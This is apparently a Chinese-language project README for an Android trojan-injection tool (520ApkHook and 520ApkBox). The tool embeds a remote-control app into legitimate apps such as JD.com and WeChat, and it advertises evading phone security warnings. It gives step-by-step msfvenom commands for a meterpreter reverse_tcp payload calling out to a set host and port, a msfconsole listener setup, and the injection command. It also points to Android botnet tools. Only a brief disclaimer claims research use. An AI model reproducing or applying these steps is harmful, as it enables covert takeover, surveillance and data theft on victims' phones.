-
将编写的安卓远控程序,注入到正常的App中,运行app时安卓远控程序也会上线。
-
修复上一版本的bug,使用java重写,同时还重写了520ApkBox程序,专门用来运行运行APP和远控App。
-
520ApkBox是一个java编写的App,主要作用是一个安卓虚拟机,任何App可以不用任何修改就可以正常运行,可以绕过现在各种App的安全检测。同时此App还是一个加载器,通过DexClassesLoder加载远控的Dex文件并启动上线。
-
520ApkHook是Java编写的注入工具,将被注入的App和远控App注入到一个App中。
-
作者: BaoGuo
-
相比于普通的安卓远控,此版本app在进行远控时,被注入的app可以正常运行。
-
注入后的app在安装时,手机管家不会有任何安全提示,普通的远控程序,安装时手机管家会有安全警示。
-
理论上来说,只要远控软件使用的是纯Java或者Kotlin编写,就可以使用,不一定必须是msf生成的apk。
- 下载Releases中打包好的jar包
- msfmsfvenom
msfvenom -p android/meterpreter/reverse_tcp lhost=114.114.114.114 lport=3306 -o ~/Downloads/msf.apk
- msfconsole
# 启动 msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3306
set exitonsession false
exploit -j
- 520ApkHook
java -jar a520ApkHook-1.0-jar-with-dependencies.jar ~/Downloads/京东.apk ~/Downloads/msf.apk
- BaoGuo仍给你一个Apk,请安装它!
-
一款安卓僵尸网络远控工具, 服务端是web网页, 基于https://deta.space 搭建(匿名):
-
一款安卓远控程序, 服务端是GUI程序:
-
搜集的一些github上的安卓远控项目:
-
微信只能通过应用克隆的方式安装,需要先指定微信的apk包,生成520ApkHook.apk. 再使用np管理器把assets目录下的和微信大小一样的文件给删除掉。再使用np管理器重新进行签名即可.(这种方法要求目标机器上要已经安装微信.)
-
新生成的apk的包名字, 不能和被注入的apk包名字一样, 程序默认已经修改.
-
msf无法在鸿蒙OS使用, 文件读取在鸿蒙OS上也无法正常使用.
-
其他未测试...
-
本项目参考以下项目
-
由于安卓虚拟化牵扯到其他github上被下架的程序,在这里不再进行列出,避免被影响。
-
本项目仅用于安全研究, 禁止利用脚本进行攻击, 使用本脚本产生的一切问题和本人无关.
-
由于此软件是基于安卓虚拟化来实现的,虚拟化软件对于不同版本的系统会出现BUG,可以自行修改520ApkBox项目源码 (欢迎大佬提交pull) .
